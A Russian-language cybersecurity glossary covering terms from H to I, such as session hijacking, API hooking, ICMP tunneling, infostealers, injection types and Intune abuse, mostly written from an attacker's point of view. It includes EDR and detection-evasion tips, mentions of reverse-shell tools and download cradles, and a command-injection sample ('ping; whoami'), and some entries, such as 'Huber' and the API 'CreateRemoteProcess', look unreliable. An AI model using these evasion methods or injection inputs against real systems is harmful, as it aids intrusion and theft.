Hijacking (DNS) Угон DNS: подмена DNS-записей для перенаправления трафика на сервер атакующего. Методы: DNS poisoning (отравление кэша), компрометация регистратора (изменение NS-записей), BGP hijacking (перехват IP-блоков). DNS hijacking используется для фишинга (подмена банковских сайтов), распространения малвари, или для отключения C2 (если домен жертвы используется для C2).

Hijacking (Session) Угон сессии: захват активной сессии пользователя (cookies, токены) для получения доступа без пароля и MFA. Методы: XSS (кража document.cookie), инфостилер (кража cookies из браузера), перехват трафика (MITM), AiTM (Adversary-in-the-Middle). Session hijacking используется для обхода MFA, потому что сессия уже аутентифицирована. ShinyHunters использует session hijacking для доступа к Salesforce.

HIPAA (Health Insurance Portability and Accountability Act) Закон США о переносимости и подотчетности медицинского страхования, регулирующий защиту медицинских данных (PHI Protected Health Information). Нарушение HIPAA влечет штрафы до $1.5 млн за инцидент. Для атакующего HIPAA leverage в extortion: угроза сообщить о нарушении HIPAA в HHS (Department of Health and Human Services) усиливает давление на жертву. Interlock цитирует HIPAA в ransom notes при атаках на healthcare (DaVita, Ohio healthcare system).

HIPS (Host-based Intrusion Prevention System) Система предотвращения вторжений на хосте, анализирующая системные вызовы, сетевые соединения, изменения в файловой системе. HIPS (например, часть EDR) может блокировать подозрительные действия в реальном времени. Для обхода HIPS атакующие используют: direct syscalls (обход хуков), memory-only payloads, отключение через BYOVD, или использование легитимных инструментов, которые HIPS не блокирует.

HMI (Human-Machine Interface) Интерфейс оператора в промышленных системах (SCADA, DCS). HMI позволяет оператору контролировать и управлять производственными процессами. Компрометация HMI (через RDP, уязвимости в веб-интерфейсе, или физический доступ) может привести к: изменению технологических параметров (давление, температура, концентрация химикатов), остановке производства, созданию аварийных ситуаций. В атаке на водоканал в Техасе (2026) злоумышленники получили доступ к HMI через RDP без MFA.

Honeypot Ловушка для злоумышленников: система, выглядящая как уязвимая цель (сервер, база данных, IoT-устройство), но на самом деле логирующая действия атакующего. Honeypot используется защитниками для: изучения TTPs атакующих, сбора IoC (Indicators of Compromise), отвлечения от реальных целей. Для атакующего honeypot риск: потратить время на фальшивую цель, раскрыть свои инструменты и техники. Признаки honeypot: слишком легкий доступ, аномально высокая активность, отсутствие реальных данных.

Honeytoken Цифровая приманка: ссылка, файл, DNS-имя, email-адрес, которые выглядят как легитимные, но при обращении к ним отправляют уведомление администратору. Honeytoken используется для обнаружения: кражи данных (файл "passwords.txt" на сетевой папке), lateral movement (DNS-имя, которое никто не должен разрешать), компрометации учетных записей (email-адрес, который не должен получать письма). Для обхода honeytoken атакующий должен энумерировать такие приманки перед доступом.

Hook (API) Перехват (хук) API-функций: замена адреса функции в памяти на адрес функции-обходчика (detour). EDR ставят хуки на критические API (CreateRemoteProcess, NtCreateThread, NtAllocateVirtualMemory) для мониторинга активности. Для обхода хуков атакующие используют: direct syscalls (обращение к ядру напрямую, минуя хуки в ntdll.dll), unhooking (восстановление оригинальных байтов), или выполнение из удаленных процессов.

Hot Wallet Криптовалютный кошелек, подключенный к интернету (в отличие от cold wallet оффлайн). Hot wallet используется биржами и DeFi-протоколами для оперативных транзакций. Для атакующего hot wallet цель: компрометация приватного ключа (через infostealer, уязвимости в смарт-контракте, социальную инженерию) позволяет вывести средства. Bybit $1.5B атака на холодный кошелек через мультисиг, не на hot wallet.

HPC (High-Performance Computing) Высокопроизводительные вычисления (суперкомпьютеры, кластеры). HPC-системы используются в научных исследованиях, моделировании климата, криптографии. Для атакующего HPC цель: кража данных исследований, использование вычислительных мощностей для майнинга (cryptojacking), или disruption (уничтожение результатов расчетов). HPC-системы часто имеют слабую защиту, так как приоритет производительность.

HSM (Hardware Security Module) Аппаратный модуль безопасности, защищающий криптографические ключи (приватные ключи TLS, ключи подписи кода, ключи шифрования). HSM не позволяет экспортировать ключи в открытом виде, только использовать их внутри модуля. Для атакующего HSM препятствие: ключи нельзя украсть программно. Однако уязвимости HSM (side-channel attacks, физический доступ) могут позволить извлечь ключи. В корпоративной среде HSM используется для защиты самых критических ключей.

HTML Smuggling Техника доставки малвари, при которой вредоносный файл собирается на стороне клиента из HTML/JavaScript, обходя сетевые фильтры (email gateway, proxy). JavaScript создает Blob, затем вызывает download, и браузер сохраняет файл на диск. HTML smuggling используется для обхода антивирусов на шлюзах, которые не анализируют JavaScript-сборку. В 2026 HTML smuggling остается популярным методом доставки.

HTTP/2 Вторая версия протокола HTTP, поддерживающая мультиплексирование (несколько запросов по одному соединению), сжатие заголовков, серверный push. HTTP/2 используется для C2: мультиплексирование позволяет скрыть C2-трафик среди легитимных запросов, сжатие уменьшает объем трафика, серверный push может использоваться для отправки команд без heartbeat. Malleable C2 профили Cobalt Strike поддерживают HTTP/2.

HTTP/3 Третья версия HTTP, работающая поверх QUIC (UDP). HTTP/3 обеспечивает более быстрое соединение, встроенное шифрование, устойчивость к потере пакетов. Для C2 HTTP/3 привлекателен тем, что QUIC трафик (UDP) реже фильтруется, чем TCP, и сложнее детектируется.

HTTPS HTTP поверх TLS (SSL), обеспечивающий шифрование и аутентификацию сервера. HTTPS основной протокол для C2 в 2026: трафик выглядит как обычный браузерный, использует порт 443, который редко блокируется. Для скрытия C2 атакующие используют: легитимные сертификаты (stolen или Let's Encrypt), имитацию User-Agent браузеров, malleable C2 профили (Cobalt Strike), domain fronting.

Huber Хакер, специализирующийся на социальной инженерии и взломе людей (от англ. "human" + "uber"). Huber использует vishing, phishing, pretexting, baiting для получения доступа. The Com (Scattered Spider) пример huber: звонки в helpdesk, убеждение сбросить MFA, установка легитимных RMM-инструментов.

HUD (Heads-Up Display) В контексте пентеста HUD визуализация данных (например, BloodHound для AD, или панель управления C2). HUD помогает атакующему видеть общую картину: attack paths, скомпрометированные системы, прогресс.

Hunting (Threat Hunting) Проактивный поиск скрытых угроз в сети (threat hunting). Threat hunter использует данные EDR, SIEM, сетевые логи для поиска аномалий, которые могли быть пропущены автоматическими детектами. Для атакующего threat hunting угроза: даже если EDR не сработал, аналитик может обнаружить аномалию (необычный процесс, латеральное движение в нерабочее время). Чтобы избежать обнаружения, атакующий должен имитировать легитимное поведение (behavioral blending) и действовать в рабочие часы.

HVAC (Heating, Ventilation, Air Conditioning) Системы отопления, вентиляции, кондиционирования. HVAC-системы часто подключены к корпоративной сети для удаленного управления, имеют default credentials, уязвимые протоколы (BACnet, Modbus). Компрометация HVAC может быть использована для: disruption (отключение климат-контроля в дата-центре), физического проникновения (отключение датчиков движения), или как pivot в OT-сеть.

Hybrid Cloud Гибридное облако: комбинация локальной инфраструктуры (on-prem) и облачных сервисов (AWS, Azure). Гибридные среды создают дополнительные уязвимости: синхронизация AD с Azure AD (AADConnect), гибридные приложения, общие учетные записи. Атака на гибридную среду может начаться с on-prem, затем перейти в облако через AADConnect, или наоборот. Handala атаковала Stryker через Intune (облако), который управлял как облачными, так и on-prem устройствами.

Hydra (THC-Hydra) Инструмент для онлайн-брутфорса паролей (SSH, FTP, HTTP, RDP, и другие протоколы). Hydra используется для атак на сервисы с аутентификацией, где нет блокировки после нескольких попыток. В 2026 Hydra считается legacy, заменяется credential stuffing и более продвинутыми инструментами, но все еще используется против legacy-систем.

Hyper-V Гипервизор Microsoft для виртуализации. Hyper-V используется в корпоративных средах, на серверах и рабочих станциях (Windows 10/11 Pro/Enterprise). Атаки на Hyper-V: VM escape (побег из виртуальной машины на хост), атаки на виртуальные коммутаторы, кража файлов VHDX (образы дисков виртуальных машин). В атаке на JLR, вероятно, использовался ESXi, но Hyper-V также может быть целью.

Hypervisor Программное обеспечение для виртуализации (VMware ESXi, Microsoft Hyper-V, KVM, Xen). Гипервизор управляет виртуальными машинами (VM). Для атакующего гипервизор цель: компрометация гипервизора дает доступ ко всем VM, их памяти, дискам, сети. Атаки на гипервизор: VM escape (побег из VM на хост), уязвимости в драйверах (BYOVD), misconfig (административные интерфейсы, открытые в интернет). ESXi ransomware (Qilin, BlackCat) шифрует VM, а не гипервизор напрямую.

I

IaaS (Infrastructure as a Service) Облачная инфраструктура как услуга (AWS EC2, Azure Virtual Machines, Google Compute Engine). IaaS предоставляет виртуальные серверы, хранилища, сети. Для атакующего IaaS среда для развертывания C2 (Command and Control), эксфильтрации данных (S3, Azure Blob), криптомайнинга (cryptojacking). Компрометация IaaS-аккаунта (через украденные AWS-ключи, Azure AD) дает доступ к вычислительным ресурсам и данным.

IaaS Misconfiguration Ошибки конфигурации в облачной инфраструктуре: публичные S3-бакеты (public-read), открытые порты (RDP 3389 в интернет), незащищенные ключи (AWS-ключи в Git), отсутствие MFA для root-аккаунта. IaaS misconfig одна из главных причин утечек данных. ShinyHunters ищет misconfig в Salesforce (SaaS), аналогичные misconfig существуют в IaaS.

IAB (Initial Access Broker) Брокеры первоначального доступа: злоумышленники, специализирующиеся на взломе сетей (через RDP с уязвимыми паролями, VPN без MFA, фишинг, эксплуатацию уязвимостей) и продаже этого доступа другим группам (ransomware, APT, шпионы). IAB продают: RDP-доступ, VPN-доступ, webshells, учетные записи администраторов. Цены: от $50 за доступ к малому бизнесу до $10,000+ за доступ к крупным корпорациям. IAB критическое звено экосистемы RaaS (Ransomware-as-a-Service): вместо того чтобы тратить время на initial access, аффилиаты покупают его у IAB.

IAT (Import Address Table) Таблица импортируемых функций в PE-файлах (Windows-исполняемых). IAT содержит список внешних функций (из DLL), которые использует программа. Для evasion атакующие используют: динамическую загрузку функций (GetProcAddress) вместо статического импорта, чтобы IAT не показывала подозрительные API (WriteProcessMemory, CreateRemoteThread). Обфускация IAT затрудняет статический анализ малвари.

IBAN (International Bank Account Number) Международный номер банковского счета. В BEC-атаках (Business Email Compromise) атакующие подделывают счета, указывая свой IBAN вместо IBAN поставщика. Жертва переводит деньги на подконтрольный счет, который затем обналичивается через drop network. IBAN используется в странах Европы и многих других; в США аналоги routing number и account number.

ICMP (Internet Control Message Protocol) Протокол управления сообщениями в интернете, используемый для диагностики (ping, traceroute). ICMP используется для: C2 (ICMP-туннели данные передаются в ICMP Echo Request/Reply), эксфильтрации (кодирование данных в ICMP-пакетах), DoS (ping flood). ICMP-трафик часто не фильтруется и не проверяется глубоко, что делает его привлекательным каналом для скрытой коммуникации.

ICMP Tunneling Туннелирование через ICMP-протокол: передача данных в ICMP Echo Request (пинг) и Echo Reply (ответ). Инструменты: icmptunnel, ptunnel. ICMP-туннели используются для C2 и эксфильтрации, когда другие протоколы (HTTP, DNS) заблокированы. Обнаружение: аномальный объем ICMP-трафика, слишком большие пакеты (стандартный ping 64 байта).

ICS (Industrial Control Systems) Промышленные системы управления: SCADA, DCS, PLC (программируемые логические контроллеры), RTU (Remote Terminal Units). ICS используются в энергетике, водоснабжении, химической промышленности, атомной энергетике. Атаки на ICS могут иметь физические последствия: отключение электричества, разрушение оборудования, утечка химикатов. Протоколы ICS: Modbus, DNP3, PROFINET, OPC. Атака на водоканал в Техасе (2026) пример компрометации ICS через RDP с последующим изменением уровня хлора.

IDA Pro (Interactive Disassembler) Коммерческий дизассемблер и отладчик, стандарт де-факто для reverse engineering. IDA Pro используется для анализа малвари, поиска уязвимостей, reverse engineering защитных механизмов (EDR, антивирусы). Поддерживает множество процессоров (x86, x64, ARM, MIPS). Альтернативы: Ghidra (бесплатный), Binary Ninja. Для атакующего IDA Pro инструмент для анализа софта, который нужно взломать.

Identity Management (IdM) Управление идентификациями: системы, хранящие и управляющие учетными записями пользователей, группами, правами доступа. Примеры: Active Directory, Azure AD, Okta, Ping Identity. Для атакующего IdM главная цель: компрометация IdM дает доступ ко всем приложениям и данным организации. The Com атакует Okta и Azure AD через vishing и OAuth token theft.

Identity Theft Кража личности: использование украденных PII (имя, SSN, дата рождения) для открытия счетов, получения кредитов, покупок, уклонения от ответственности. Identity theft может длиться годами, жертва узнает о ней, когда приходят счета за кредиты, которые она не брала. Источники данных: утечки (Conduent 25M+ записей, Wynn 800k записей), инфостилеры. Для атакующего identity theft способ монетизации украденных данных (продажа fullz) или инструмент для создания synthetic identity.

IDOR (Insecure Direct Object Reference) Уязвимость, позволяющая получить доступ к объектам (файлам, записям в базе данных) по прямому идентификатору (ID), если не проверены права доступа. Пример: изменение параметра в URL https://site.com/invoice/12345 на 12346 позволяет увидеть чужой счет. IDOR часто встречается в API и веб-приложениях. ShinyHunters могла бы использовать IDOR в Salesforce, если бы guest user permissions не были уже over-permissive.

IDS (Intrusion Detection System) Система обнаружения вторжений (network IDS, host IDS). IDS анализирует трафик или логи и сигнализирует о подозрительной активности. В отличие от IPS (Intrusion Prevention System), IDS не блокирует, только уведомляет. Для атакующего IDS угроза, но не препятствие: можно действовать так, чтобы не создавать сигнатур, или атаковать сам IDS (например, переполнить логами).

IEEE (Institute of Electrical and Electronics Engineers) Организация, разрабатывающая стандарты, включая сетевые (802.11 Wi-Fi, 802.3 Ethernet). В контексте атак IEEE стандарты определяют протоколы, которые могут иметь уязвимости (WPA2 KRACK, WPA3 downgrade). Понимание стандартов помогает в разработке эксплойтов для сетевого оборудования.

IETF (Internet Engineering Task Force) Организация, разрабатывающая интернет-стандарты (RFC). IETF определяет протоколы: TCP, IP, HTTP, TLS. Уязвимости в реализации протоколов (например, POODLE на SSLv3) могут использоваться для атак. Для атакующего знание RFC помогает понять, как протокол должен работать, и где возможны отклонения.

IIS (Internet Information Services) Веб-сервер Microsoft. IIS используется для хостинга веб-приложений, включая SharePoint, Exchange. Уязвимости IIS: directory traversal, RCE (CVE-2017-7269), misconfig (публичные папки). Компрометация IIS может быть точкой входа в корпоративную сеть.

IKE (Internet Key Exchange) Протокол обмена ключами для IPsec (VPN). IKE уязвим к: downgrade attacks (принуждение к использованию слабой криптографии), brute force (слабые PSK Pre-Shared Keys), DoS (IKE flood). Компрометация IKE дает доступ к VPN, что может быть initial access для корпоративной сети.

IKET (IKEv2) Версия 2 протокола IKE. IKEv2 поддерживает EAP (Extensible Authentication Protocol) для аутентификации по сертификатам, MFA. Для атакующего IKEv2 сложнее взломать, чем IKEv1, но возможен MITM при неправильной настройке.

IL (Intermediate Language) Промежуточный язык .NET (CIL Common Intermediate Language). .NET-малварь (C#, VB.NET) компилируется в IL, который затем JIT-компилируется в машинный код. IL может быть легко декомпилирован (dnSpy, ILSpy), поэтому атакующие используют обфускаторы (ConfuserEx, .NET Reactor) для защиты.

IMAP (Internet Message Access Protocol) Протокол доступа к электронной почте, позволяющий читать письма на сервере без их скачивания. IMAP используется в BEC-атаках: атакующий, скомпрометировав учетную запись, может читать почту, создавать правила пересылки, отправлять письма от имени владельца. IMAP не шифрует пароли (PLAIN), если не используется TLS.

IMEI (International Mobile Equipment Identity) Уникальный идентификатор мобильного устройства. IMEI может быть использован для: отслеживания местоположения (через сотовую сеть), блокировки устройства (черный список), клонирования (изменение IMEI для обхода блокировок). SIM-swapping атаки часто начинаются с получения IMEI жертвы.

IMSI (International Mobile Subscriber Identity) Уникальный идентификатор абонента сотовой сети. IMSI может быть перехвачен через поддельные базовые станции (IMSI catcher, Stingray). IMSI catcher используется для отслеживания местоположения, перехвата SMS (для обхода MFA). Для атакующего IMSI catcher инструмент для физического пентеста.

IMSI Catcher Устройство, имитирующее базовую станцию сотовой связи, заставляющее телефоны подключаться к нему. IMSI catcher перехватывает IMSI, может перехватывать SMS, голосовые звонки (если не используется шифрование), определять местоположение. Используется law enforcement и злоумышленниками. Для обхода MFA через SMS IMSI catcher может перехватить код подтверждения.

In-Memory Execution Выполнение кода в оперативной памяти без записи на диск (memory-only). In-memory execution используется для: обхода антивирусов (нет файла для сканирования), сокрытия от forensics (после перезагрузки следы исчезают), уменьшения IoC. Cobalt Strike Beacon, Slopoly (AI-сгенерированный C2), многие инфостилеры работают in-memory.

In-Memory Payload Полезная нагрузка, загружаемая и выполняемая в оперативной памяти без сохранения на диск. In-memory payload загружается через: PowerShell (Invoke-Expression, Invoke-ReflectivePEInjection), процесс-инъекцию (CreateRemoteThread), или через уязвимости. Используется для обхода антивирусов и EDR.

Incident Response (IR) Процесс реагирования на инциденты информационной безопасности: обнаружение, анализ, сдерживание, ликвидация последствий, восстановление, пост-инцидентный анализ. IR-команда противник атакующего. Скорость и эффективность IR определяет, успеет ли атакующий достичь цели до того, как его выкинут из сети.

Incognito Mode Режим инкогнито в браузере (приватный режим), который не сохраняет историю, cookies, кэш после закрытия окна. Однако режим инкогнито не защищает от инфостилеров: cookies и пароли, введенные в сессии, могут быть украдены, если малварь имеет доступ к памяти браузера. Для атакующего режим инкогнито не препятствие.

Indicator (IoC) См. Indicator of Compromise. IoC (Indicator of Compromise) индикатор компрометации: данные, указывающие на возможную атаку: IP-адрес C2, хэш малвари, домен, строка в реестре, имя процесса, артефакт в логах. IoC используются защитниками для обнаружения и блокировки. Для атакующего IoC то, что нужно не оставлять: использовать динамические IP, менять хэши при каждой компиляции (полиморфизм), не писать на диск (memory-only), использовать легитимные процессы.

Indicator of Compromise (IoC) Индикатор компрометации: данные, указывающие на возможную атаку: IP-адрес C2, хэш малвари, домен, строка в реестре, имя процесса. IoC используются защитниками для обнаружения и блокировки. Для атакующего IoC то, что нужно не оставлять: использовать динамические IP, менять хэши при каждой компиляции (полиморфизм), не писать на диск.

Information Disclosure Раскрытие информации (information disclosure): уязвимость, позволяющая злоумышленнику получить чувствительные данные (версии ПО, имена пользователей, пути к файлам, конфигурации). Information disclosure используется для: дальнейшей атаки (например, зная версию, найти известную уязвимость), сбора информации для социальной инженерии. Пример: error message, раскрывающая путь к файлу.

Infostealer Вредоносное ПО, предназначенное для кражи данных с зараженного устройства: пароли из браузеров (Chrome, Edge, Firefox), cookies (сессионные токены), файлы автозаполнения (адреса, кредитные карты), крипто-кошельки (десктопные кошельки, расширения браузера), файлы (десктоп, документы), скриншоты, данные Telegram/WhatsApp/Discord (локальные базы), системная информация (IP, hardware ID, установленное ПО). Популярные инфостилеры 2026: RedLine, LummaC2, Stealc, Vidar. Инфостилеры распространяются через malvertising, crack-сайты, фишинговые письма. Украденные данные продаются на даркнет-маркетах (Russian Market, Alphabay) или агрегируются для credential stuffing.

Infrastructure as Code (IaC) Управление инфраструктурой через код (Terraform, CloudFormation, Ansible). IaC-файлы могут содержать секреты (пароли, ключи) в plaintext, если разработчики не используют секретные менеджеры. Для атакующего утечка IaC-репозитория (GitHub) goldmine: ключи доступа к облаку, пароли к базам данных, конфигурация сети.

Initial Access Начальный доступ: первый этап атаки, на котором злоумышленник получает возможность выполнять код в целевой сети. Методы: фишинг (email с вложением или ссылкой), эксплуатация уязвимостей (RCE на веб-сервере), покупка доступа у IAB, vishing (звонок в helpdesk с просьбой сбросить MFA), физический доступ (USB-дроп). The Com специализируется на initial access через vishing и helpdesk.

Initial Access Broker (IAB) Брокеры первоначального доступа (Initial Access Brokers) злоумышленники, специализирующиеся на взломе сетей (через RDP с уязвимыми паролями, VPN без MFA, фишинг, эксплуатацию уязвимостей) и продаже этого доступа другим группам (ransomware, APT, шпионы). IAB продают: RDP-доступ, VPN-доступ, webshells, учетные записи администраторов. Цены: от $50 за доступ к малому бизнесу до $10,000+ за доступ к крупным корпорациям. IAB критическое звено экосистемы RaaS (Ransomware-as-a-Service).

Injection (Code) Внедрение кода: техника, при которой вредоносный код вставляется в выполняющийся процесс. Виды: process injection (CreateRemoteThread), DLL injection, APC injection, process hollowing (замена кода легитимного процесса), reflective DLL injection (без вызова LoadLibrary). Code injection используется для сокрытия активности (код выполняется в легитимном процессе) и обхода firewall (процесс имеет разрешенные сетевые правила).

Injection (Command) Command injection: внедрение команд операционной системы в параметры, передаваемые в shell. Пример: ping; whoami. Command injection дает атакующему выполнение произвольных команд на сервере, часто с привилегиями веб-сервера. Используется для получения reverse shell, скачивания малвари, кражи данных.

Injection (CRLF) CRLF-инъекция (Carriage Return Line Feed): внедрение символов перевода строки в HTTP-заголовки, что позволяет добавлять новые заголовки или разделять ответ на два. Используется для: XSS, session fixation, cache poisoning. CRLF-инъекция возможна, если приложение не экранирует символы CR и LF.

Injection (HTML) HTML-инъекция: внедрение HTML-кода в веб-страницу, что позволяет изменять внешний вид сайта, красть данные (через фишинговые формы), перенаправлять пользователей. HTML-инъекция часто является частью XSS, но может существовать отдельно.

Injection (LDAP) LDAP-инъекция: внедрение кода в LDAP-запросы (Active Directory, OpenLDAP). Используется для: обхода аутентификации, кражи данных из LDAP (список пользователей, групп), повышения привилегий. LDAP-инъекция возможна, если приложение строит LDAP-фильтры из пользовательского ввода без экранирования.

Injection (SQL) SQL-инъекция: внедрение SQL-кода в параметры запроса, что позволяет выполнять произвольные SQL-команды на сервере базы данных. Используется для: кражи данных, модификации данных, выполнения команд (если есть xp_cmdshell), обхода аутентификации. В 2026 SQL injection встречается в старых веб-приложениях, а также в API, где параметры не экранируются.

Insider Threat Инсайдерская угроза: сотрудник, подрядчик или партнер, имеющий легитимный доступ, который использует его во вред организации. Инсайдер может: украсть данные (конфиденциальные документы, PII), установить backdoor, отключить защиту, передать доступ атакующим. LAPSUS$ использовал инсайдеров для доступа к SaaS-платформам. Для атакующего вербовка инсайдера один из способов initial access.

Instagram OSINT Сбор информации о целях через Instagram: фотографии (геолокация, обстановка на рабочем месте), список контактов, интересы, привычки. Instagram OSINT используется для социальной инженерии (подготовка vishing, spear-phishing). The Com использует Instagram и другие соцсети для сбора информации о сотрудниках целевых компаний.

Intel (Threat Intelligence) Разведка угроз: сбор, анализ и распространение информации о киберугрозах: TTPs (тактики, техники, процедуры) групп, IoC (индикаторы компрометации), уязвимости. Threat intelligence используется защитниками для проактивной защиты. Для атакующего threat intelligence означает, что его TTPs могут стать известными, и детекты будут настроены. Поэтому атакующий должен постоянно менять TTPs.

Intelligence (OSINT) Открытые источники разведки (OSINT Open Source Intelligence): сбор информации из публичных источников: социальные сети, новости, форумы, DNS-записи, WHOIS, Shodan, Github. OSINT используется для рекогносцировки: сбор email-адресов сотрудников, IP-адресов, технологического стека, информации о партнерах. ShinyHunters использует OSINT для поиска Salesforce Experience Cloud сайтов.

Interactive Shell Интерактивная оболочка (shell), позволяющая выполнять команды и получать вывод в реальном времени, в отличие от неинтерактивной (например, один вызов командной строки). Интерактивный shell (reverse shell, SSH) необходим для сложных операций: навигации по файловой системе, редактирования файлов, запуска скриптов. Для получения интерактивного shell атакующие используют: reverse shell (nc, python, powershell), веб-шеллы с терминалом, C2-агенты.

Intercept (Traffic) Перехват трафика (MITM Man-in-the-Middle): техника, при которой злоумышленник встраивается между двумя сторонами (жертвой и сервером), перехватывая и потенциально модифицируя данные. Методы: ARP poisoning, DNS spoofing, BGP hijacking, поддельные Wi-Fi точки доступа (Evil Twin). Перехват трафика используется для: кражи паролей и cookies, модификации данных, инъекции малвари, обхода MFA (AiTM).

Interlock Ransomware-группа, связанная с экосистемой VICE SPIDER (Vice Society, Rhysida). Interlock известна: использованием zero-day (CVE-2026-20131 в Cisco FMC), memory-resident webshells, агрессивным удалением логов (HAProxy cron jobs), атаками на образование, здравоохранение, правительственные организации. Interlock имеет operational hours UTC+3 (Москва/Ближний Восток). В марте 2026 Amazon раскрыл их инфраструктуру через misconfigured staging server. Interlock практикует double extortion (шифрование + кража данных).

Internal Network Внутренняя сеть организации, недоступная из интернета. После получения initial access атакующий исследует внутреннюю сеть: ищет серверы с ценными данными (базы данных, файловые серверы), контроллеры домена, системы управления (Intune, SCCM). Для движения во внутренней сети используются: RDP, PsExec, WMI, SMB, WinRM. The Com после vishing получает доступ во внутреннюю сеть через легитимные RMM-инструменты.

Internet of Things (IoT) Интернет вещей: устройства, подключенные к интернету (камеры, роутеры, принтеры, умные колонки, медицинские устройства). IoT-устройства часто имеют: default credentials, не обновляются, уязвимые протоколы (Telnet, UPnP). IoT используется для: DDoS-ботнетов (Mirai), начальной точки входа в сеть (компрометация IoT устройства, имеющего доступ к корпоративной сети), шпионажа (IP-камеры). MuddyWater взламывал IP-камеры для поддержки ракетных ударов.

Interpreter Интерпретатор (Python, PowerShell, PHP, JavaScript), выполняющий код без компиляции. Для атакующего интерпретаторы инструмент для: запуска скриптов (PowerShell для выполнения малвари), безфайлового выполнения (Invoke-Expression), обхода политик (PowerShell ExecutionPolicy Bypass). ClickFix использует PowerShell-интерпретатор для выполнения скрипта, скопированного жертвой.

Intrusion Detection System (IDS) Система обнаружения вторжений (Intrusion Detection System). IDS анализирует сетевой трафик (NIDS) или системные логи (HIDS) и сигнализирует о подозрительной активности. В отличие от IPS (Intrusion Prevention System), IDS не блокирует, только уведомляет. Для атакующего IDS угроза: нужно действовать так, чтобы не создавать сигнатур, или атаковать сам IDS (например, переполнить логами).

Intrusion Prevention System (IPS) Система предотвращения вторжений, блокирующая подозрительную активность в реальном времени (в отличие от IDS, который только сигнализирует). IPS может блокировать IP-адреса, закрывать сессии, отключать порты. Для обхода IPS атакующие используют: шифрованный трафик (TLS), медленные атаки (low & slow), или атакуют сам IPS.

Intune (Microsoft Intune) Платформа управления мобильными устройствами (MDM) и приложениями от Microsoft. Intune позволяет централизованно управлять Windows, iOS, Android, macOS устройствами: устанавливать приложения, настраивать политики безопасности, удаленно стирать данные (wipe). Handala использовала Intune для destructive атаки на Stryker: скомпрометировав Global Admin аккаунт, они отправили массовую команду factory reset на 200,000 устройств, уничтожив их без использования малвари. Intune пример легитимного инструмента, ставшего оружием (LOTL).

Intune Abuse Злоупотребление Microsoft Intune для вредоносных целей: удаленное стирание устройств (wipe), развертывание вредоносных скриптов через политики, отключение защит (Defender), установка backdoor. Intune abuse не требует малвари (weapon is the management console itself), не оставляет сигнатур для EDR, и может быть выполнен массово. Handala продемонстрировала Intune abuse, уничтожив 200k устройств Stryker. CISA выпустила экстренный гайд по защите Intune после этой атаки.

Inventory (Asset) Инвентаризация активов: список всех устройств, ПО, сервисов в организации. Для атакующего инвентаризация цель: зная, какие системы есть, можно выбрать цель (например, непропатченный сервер). Инвентаризация часто хранится в CMDB (Configuration Management Database), ServiceNow, Excel-файлах.

Invisible Captcha Невидимая CAPTCHA (reCAPTCHA v3), которая не требует взаимодействия с пользователем, оценивает поведение (движения мыши, время на странице) для определения бота. Для атакующего invisible captcha сложнее обойти, чем обычную (требуется имитация человеческого поведения). Используется для защиты от credential stuffing и автоматизированных атак.

Invoke-Command (PowerShell) Командлет PowerShell для удаленного выполнения команд на других компьютерах (через WinRM). Invoke-Command используется для: lateral movement (выполнение команд на удаленных серверах), развертывания малвари, сбора информации. Требует права администратора на целевой системе и включенный WinRM.

Invoke-Expression (IEX) Командлет PowerShell, выполняющий строку как код PowerShell. IEX используется для: безфайлового выполнения (скачать скрипт с C2 и выполнить), обхода политик (ExecutionPolicy bypass), запуска малвари. IEX часто используется в ClickFix: жертва копирует скрипт, который содержит IEX с download cradle.

Invoke-Mimikatz Версия Mimikatz, встроенная в PowerShell (часть PowerSploit). Invoke-Mimikatz выполняет Mimikatz в памяти без записи на диск. Используется для: дампа паролей из LSASS, Golden Ticket, DCSync, Pass-the-Hash. Invoke-Mimikatz активно детектируется EDR, поэтому атакующие используют кастомные версии или другие инструменты.

IoA (Indicator of Attack) Индикатор атаки: паттерн поведения, указывающий на активную атаку (в отличие от IoC, который указывает на уже произошедшую компрометацию). Пример: необычное количество неудачных логинов (brute force), запуск PowerShell из Office (macro). IoA используются для обнаружения атак в реальном времени.

IoC (Indicator of Compromise) См. Indicator of Compromise.

iOS Операционная система Apple для мобильных устройств. iOS считается более защищенной, чем Android, но уязвима к: zero-click эксплойтам (iMessage), jailbreak (обход sandbox), атакам на цепочку поставок (XcodeGhost). Для атакующего iOS цель: кража данных (iCloud), слежка, взлом через физический доступ (Cellebrite). Handala угрожала взломом iPhone 12 Pro Max жертвы.

IP (Internet Protocol) Интернет-протокол, отвечающий за адресацию и маршрутизацию пакетов. В контексте атак IP используется для: рекогносцировки (сканирование IP-диапазонов), блокировки (IP blacklisting), сокрытия (использование VPN, прокси, Tor). IP-адреса C2 должны часто меняться (fast flux) или скрываться за CDN (domain fronting).

IP Spoofing Подмена IP-адреса отправителя в сетевых пакетах. IP spoofing используется для: DDoS-амплификации (отраженные атаки), обхода IP-фильтров, скрытия источника. Для TCP-соединений IP spoofing затруднен из-за трехстороннего рукопожатия (SYN, SYN-ACK, ACK). Используется в основном в UDP-атаках (DNS amplification, NTP amplification).

IPAM (IP Address Management) Управление IP-адресами. IPAM-системы содержат информацию о всех устройствах в сети, их IP, MAC, локации. Компрометация IPAM дает атакующему карту сети для lateral movement.

IPsec (Internet Protocol Security) Набор протоколов для защиты IP-трафика (шифрование, аутентификация). IPsec используется в VPN. Уязвимости IPsec: слабые алгоритмы (DES), downgrade attacks, misconfig (PSK, открытые порты). Компрометация IPsec VPN дает initial access в корпоративную сеть.

IR (Incident Response) Процесс реагирования на инциденты информационной безопасности: обнаружение, анализ, сдерживание, ликвидация последствий, восстановление, пост-инцидентный анализ. IR-команда противник атакующего. Скорость и эффективность IR определяет, успеет ли атакующий достичь цели до того, как его выкинут из сети. Методы IR: изоляция хостов, блокировка IP, сброс учетных записей, восстановление из бэкапов.

IRC (Internet Relay Chat) Старый протокол чата, использовавшийся для C2 в 2000-х (botnets). В 2026 IRC редко используется для C2 из-за легкости детекции, но может встречаться в legacy-малвари или как резервный канал.

IRGC (Islamic Revolutionary Guard Corps) Корпус Стражей Исламской Революции (Иран). IRGC проводит кинетические операции (ракетные удары, дроны) и координирует кибероперации с MOIS (Министерством разведки). IRGC атаковал AWS дата-центры в ОАЭ и Бахрейне 1 марта 2026. Для атакующего IRGC пример государственного актора, использующего гибридную войну (kinetic + cyber).

IRP (Incident Response Plan) План реагирования на инциденты: документированные процедуры для обнаружения, анализа, сдерживания, ликвидации последствий атаки. Для атакующего IRP препятствие: если у жертвы есть IRP, она может быстро восстановиться и не заплатить выкуп.

